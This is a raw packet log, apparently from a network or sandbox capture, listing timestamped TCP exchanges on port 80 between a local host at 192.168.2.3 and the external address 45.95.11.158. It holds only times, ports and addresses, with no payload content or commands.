Aug 23, 2022 18:24:01.464205027 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.464226007 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.464266062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.464289904 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.464318991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.464349031 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.499557972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.499614000 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.499655962 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.499706984 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.499798059 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.499839067 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.500370979 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.500431061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.500484943 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.500541925 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.500587940 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.500627041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.500669956 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.500715971 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.500726938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.500741959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.500772953 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.501029015 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.501122952 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.501190901 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.501256943 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.501313925 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.501368999 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.501374006 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.501430035 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.501480103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.501591921 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.534079075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.534115076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.534140110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.534166098 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.534192085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.534204960 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.534229040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.534236908 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.534265995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.534291029 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.534297943 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.534322023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.534346104 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.534357071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.535111904 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.535140991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.535166025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.535186052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.535202026 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.535216093 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.535219908 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.535264015 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.535290003 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.535290003 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.535307884 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.535330057 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.535378933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.535404921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.535420895 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.535434008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.535454988 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.535459995 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.535478115 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.535504103 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.535520077 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.535557032 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.535562038 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.535598993 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.535893917 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.535921097 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.535943031 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.535952091 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.535955906 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.535996914 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.536006927 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.536032915 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.536060095 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.536072969 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.536114931 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.536158085 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.536484957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.536514044 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.536534071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.536540985 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.536562920 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.536576986 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.536583900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.536611080 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.536623955 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.536637068 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.536643982 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.536662102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.536669016 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.536719084 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.536731005 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.536744118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.536752939 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.536767960 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.536781073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.536793947 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.536801100 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.536818981 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.536827087 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.536844015 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.536851883 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.536880016 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.536885977 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.536920071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.569148064 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.569185019 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.569205999 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.569245100 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.569283009 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.569344997 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.569366932 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.569397926 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.569417000 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.569433928 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.569442987 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.569466114 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.569470882 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.569487095 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.569511890 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.569515944 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.569546938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.569582939 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.569597006 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.569700003 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.569720030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.569744110 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.569771051 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.569802999 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.569807053 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.569825888 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.569844007 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.569859028 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.569870949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.569884062 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.569906950 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.570399046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.570429087 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.570451975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.570471048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.570498943 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.570540905 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.570550919 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.570594072 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.570614100 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.570640087 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.570660114 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.570667982 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.570700884 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.570717096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.570730925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.570760965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.571341038 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.571396112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.571405888 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.571441889 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.571458101 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.571470976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.571497917 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.571499109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.571525097 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.571538925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.571547985 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.571574926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.571589947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.571613073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.571619987 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.571651936 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.571657896 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.571688890 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.571691990 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.571728945 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.571778059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.571815968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.571820974 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.571903944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.571933031 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.571934938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.571952105 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.571963072 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.571974993 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.571990967 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572000980 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.572026014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572031021 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.572057009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572067976 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.572094917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.572112083 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572144985 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572154045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.572171926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572182894 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.572210073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.572218895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572247028 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572293043 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572305918 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.572339058 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.572371960 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572412968 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.572418928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572448015 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572460890 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.572485924 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.572494030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572534084 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.572539091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572585106 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572585106 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.572623968 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.572647095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572686911 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.572693110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572731018 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.572789907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572818041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.572839975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.572864056 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.604837894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.604965925 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.604967117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.605007887 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.605015993 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.605047941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.605158091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.605202913 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.605375051 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.605416059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.605422020 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.605458975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.605478048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.605505943 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.605782986 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.605829000 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.605837107 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.605880022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.606007099 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.606050968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.606055975 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.606091976 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.606237888 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.606281996 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.606288910 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.606323004 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.606667995 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.606712103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.606750011 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.606750011 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.606766939 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.606790066 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.606831074 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.606863976 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.606869936 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.606895924 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.606925011 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.606997013 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.607043028 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.607083082 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.607094049 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.607124090 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.607144117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.607165098 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.607175112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.607218027 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.607496023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.607547045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.607672930 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.607722998 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.607924938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.607975960 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.608006954 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.608052015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.608295918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.608338118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.608345985 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.608378887 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.608381987 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.608419895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.608423948 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.608464003 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.608474016 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.608505011 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.608513117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.608546019 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.608824968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.608865023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.608879089 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.608906031 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.609266043 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.609309912 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.609317064 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.609360933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.609380007 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.609407902 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.609410048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.609473944 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.609703064 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.609745979 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.609754086 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.609786987 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.610021114 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610065937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610065937 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.610106945 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.610169888 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610213041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610217094 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.610253096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610259056 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.610296011 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610297918 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.610337019 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.610337019 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610377073 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610378027 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.610416889 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.610416889 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610460997 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610462904 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.610498905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610503912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.610538960 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.610538960 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610579014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610584974 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.610621929 CEST	49827	80	192.168.2.3	45.95.11.158
